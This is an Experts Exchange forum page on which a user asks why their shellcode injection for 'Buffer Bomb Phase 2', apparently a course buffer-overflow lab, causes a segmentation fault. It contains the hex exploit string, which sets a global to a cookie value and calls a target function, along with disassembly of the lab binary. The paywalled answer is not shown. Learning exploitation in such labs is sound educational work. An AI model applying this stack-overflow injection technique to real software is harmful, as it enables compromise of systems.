Why Experts Exchange?

Experts Exchange always has the answer, or at the least points me in the correct direction! It is like having another employee that is extremely experienced.

Jim Murphy
Programmer at Smart IT Solutions

When asked, what has been your best career decision?

Deciding to stick with EE.

Mohamed Asif
Technical Department Head

Being involved with EE helped me to grow personally and professionally.

Carl Webster
CTP, Sr Infrastructure Consultant
Ask ANY Question

Connect with Certified Experts to gain insight and support on specific technology challenges including:

Troubleshooting
Research
Professional Opinions
Ask a Question
Did You Know?

We've partnered with two important charities to provide clean water and computer science education to those who need it most. READ MORE

troubleshooting Question

Buffer Bomb Phase 2

Avatar of ruevaughn
ruevaughn asked on
Assembly
4 Comments1 Solution3072 ViewsLast Modified:
Hey again! Think I almost got this one done... Heres my exploit string so far..

   0:   c7 05 dc a1 04 08 b7    movl   $0x779635b7,0x804a1dc
   7:   35 96 77
   a:   e8 5c 8d 04 08          call   0x8048d6b

779635b7 is my cookie, and 0x804a1dc is the global_value, and than I am calling bang... so I do not understand why this will not work.
I enter the exploit string as
01 02 03 04 05 ... 21 23 24 (the overflow starts after this point)  c7 05 dc a1 04 08 b7 35 96 77 e8 5c 8d 04 08.

Why am I getting a segmentation fault?

On a side note... Infinity, how did you learn this so well? Might as well get to know you a little :)
08048d60 <bang>:
 8048d60:	55                   	push   %ebp
 8048d61:	89 e5                	mov    %esp,%ebp
 8048d63:	83 ec 08             	sub    $0x8,%esp
 8048d66:	c7 04 24 02 00 00 00 	movl   $0x2,(%esp)
 8048d6d:	e8 2e fc ff ff       	call   80489a0 <entry_check>
 8048d72:	a1 dc a1 04 08       	mov    0x804a1dc,%eax
 8048d77:	3b 05 cc a1 04 08    	cmp    0x804a1cc,%eax
 8048d7d:	74 21                	je     8048da0 <bang+0x40>
 8048d7f:	89 44 24 04          	mov    %eax,0x4(%esp)
 8048d83:	c7 04 24 0f 9a 04 08 	movl   $0x8049a0f,(%esp)
 8048d8a:	e8 d5 f9 ff ff       	call   8048764 <printf@plt>
 8048d8f:	c7 04 24 00 00 00 00 	movl   $0x0,(%esp)
 8048d96:	e8 09 fa ff ff       	call   80487a4 <exit@plt>
 8048d9b:	90                   	nop    
 8048d9c:	8d 74 26 00          	lea    0x0(%esi),%esi
 8048da0:	89 44 24 04          	mov    %eax,0x4(%esp)
 8048da4:	c7 04 24 70 98 04 08 	movl   $0x8049870,(%esp)
 8048dab:	e8 b4 f9 ff ff       	call   8048764 <printf@plt>
 8048db0:	c7 04 24 02 00 00 00 	movl   $0x2,(%esp)
 8048db7:	e8 24 fd ff ff       	call   8048ae0 <validate>
 8048dbc:	eb d1                	jmp    8048d8f <bang+0x2f>
 8048dbe:	89 f6                	mov    %esi,%esi
------------------------------------------------------------------------------
08049000 <test>:
 8049000:	55                   	push   %ebp
 8049001:	89 e5                	mov    %esp,%ebp
 8049003:	83 ec 18             	sub    $0x18,%esp
 8049006:	c7 45 fc ef be ad de 	movl   $0xdeadbeef,-0x4(%ebp)
 804900d:	c7 04 24 03 00 00 00 	movl   $0x3,(%esp)
 8049014:	e8 87 f9 ff ff       	call   80489a0 <entry_check>
 8049019:	e8 c2 ff ff ff       	call   8048fe0 <getbuf>
 804901e:	89 c2                	mov    %eax,%edx
 8049020:	8b 45 fc             	mov    -0x4(%ebp),%eax
 8049023:	3d ef be ad de       	cmp    $0xdeadbeef,%eax
 8049028:	74 0e                	je     8049038 <test+0x38>
 804902a:	c7 04 24 b8 98 04 08 	movl   $0x80498b8,(%esp)
 8049031:	e8 de f6 ff ff       	call   8048714 <puts@plt>
 8049036:	c9                   	leave  
 8049037:	c3                   	ret    
 8049038:	3b 15 cc a1 04 08    	cmp    0x804a1cc,%edx
 804903e:	74 12                	je     8049052 <test+0x52>
 8049040:	89 54 24 04          	mov    %edx,0x4(%esp)
 8049044:	c7 04 24 9f 9a 04 08 	movl   $0x8049a9f,(%esp)
 804904b:	e8 14 f7 ff ff       	call   8048764 <printf@plt>
 8049050:	c9                   	leave  
 8049051:	c3                   	ret    
 8049052:	89 54 24 04          	mov    %edx,0x4(%esp)
 8049056:	c7 04 24 82 9a 04 08 	movl   $0x8049a82,(%esp)
 804905d:	e8 02 f7 ff ff       	call   8048764 <printf@plt>
 8049062:	c7 04 24 03 00 00 00 	movl   $0x3,(%esp)
 8049069:	e8 72 fa ff ff       	call   8048ae0 <validate>
 804906e:	c9                   	leave  
 804906f:	c3                   	ret
ASKER CERTIFIED SOLUTION
Avatar of Infinity08
Commented:
This problem has been solved!
Unlock 1 Answer and 4 Comments.
See Answers